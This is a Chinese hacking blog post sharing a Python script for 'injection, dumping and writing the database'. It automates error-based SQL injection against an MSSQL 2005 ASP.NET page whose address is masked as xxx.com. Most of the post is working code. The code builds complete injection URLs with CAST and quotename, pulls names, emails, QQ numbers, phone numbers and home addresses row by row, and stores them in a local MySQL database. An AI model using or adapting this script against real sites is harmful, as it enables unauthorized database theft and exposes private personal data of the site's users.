P.S:搞一站,目的脱裤,一个MSSQL2005点,不支持Union查询,只要有Cast()就报错,所以就直接写脚本拖库了
此脚本可以直接从抓去页面爆出的数据写入到本地Mysql数据库里~
和上回一样,没来的及完善成通用版本,会Python的稍微改改就好~
复制代码务必在普通IE下复制~
![Python in Hacking[注射-拖库-写库一条龙服务脚本]](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9pbWdzLzYvNS81LzQvODQvMTI1NTI3YjgyNTlmZGEzNzM2OWM2YzUzZGE1OTA1YTUuanBl.jpe?w=700&webp=1 "Python in Hacking[注射-拖库-写库一条龙服务脚本]")
- #!/usr/bin/python
- #encoding=utf-8
- ############################################
- # Coder:Pnig0s1992
- # Auto Dump the Data by using SQLinjection
- # GTalk:pnigos70@gmail.com
- # QQ:459933916
- #Blog:[url=http://pnig0s1992.blog.51cto.com/]http://pnig0s1992.blog.51cto.com/[/url]
- #
- ############################################
- import urllib
- import MySQLdb
- import sys
- def getData(count,val):
- tempurl="http://www.xxx.com/xxx.aspx?keyWord=1' and (select top 1 quotename(cast("+val+" as varchar(8000))) from xxx.dbo.xxx where cast("+val+" as varchar) not in (select top "+str(count)+" \
- cast("+val+" as varchar) from xxx.dbo.xxx))=0--"
- quoteUrl=urllib.quote_plus(tempurl,safe='\':/?-&*.=-()')
- feed = urllib.urlopen(quoteUrl)
- getItem = feed.read(2048)
- IBegin = getItem.find('[')+1
- IEnd = getItem.find(']')
- data = getItem[IBegin:IEnd].strip()
- feed.close()
- return data
- if __name__ == "__main__":
- print "\t\tCode by:Pnig0s1992\t\t"
- print "\t\tGTalk:pnigos70@gmail.com\t\t"
- print "\t\tQQ:459933916\t\t"
- url="http://www.xxx.com/xxx.aspx?keyWord=1' \
- and (select quotename(count(*)) from xxx.dbo.xxx)=0--"
- enurl = urllib.quote_plus(url,safe='\':/?-&*.=-()')
- fd = urllib.urlopen(enurl)
- getSum = fd.read(2048)
- Begin = getSum.find('[')+1
- End = getSum.find(']')
- print "%s 's items for all" % getSum[Begin:End]
- print "Holding for dumping...."
- for count in xrange(0,1012750):
- print "The No.%d items:" % (count+1)
- sname = getData(count,'SNAME')
- print "Name:%s" % sname
- content = getData(count,'CONTENT')
- print "Content:%s" % content
- sex = getData(count,'G_SEX')
- print "Sex:%s" % sex
- g_mail = getData(count,'G_MAIL')
- print "Email:%s" % g_mail
- g_qq = getData(count,'G_QQ')
- print "QQ:%s" % g_qq
- g_sj = getData(count,'G_SJ')
- print "MobilPhone:%s" % g_sj
- g_tel = getData(count,'G_TEL')
- print "Tel:%s" % g_tel
- g_adds = getData(count,'G_ADDS')
- print "Address:%s" % g_adds
- g_post = getData(count,'G_POST')
- print "PostalNum:%s" % g_post
- g_time = getData(count,'G_TIME')
- print "Date:%s" % g_time
- g_url = getData(count,'G_URL')
- print "Url:%s" % g_url
- try:
- conn = MySQLdb.connect(host="localhost",port=3306,user="root",passwd="root",db="data")
- except Exception,e:
- print "Connect database failed."
- sys.exit()
- cursor = conn.cursor()
- sql = "insert into xxxdata(SNAME,CONTENT,G_sex,G_mail,G_QQ,G_SJ,G_Tel,G_adds,G_post,G_time,\
- G_url) values('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (sname,content,sex,g_mail,g_qq,g_sj,g_tel,g_adds,g_post,g_time,g_url)
- try:
- cursor.execute(sql)
- except Exception,e:
- print "Insert data failed"
- sys.exit()
- print "Current items has been written to database."
- print ""
本文出自 “About:Blank H4cking” 博客,请务必保留此出处http://pnig0s1992.blog.51cto.com/393390/475733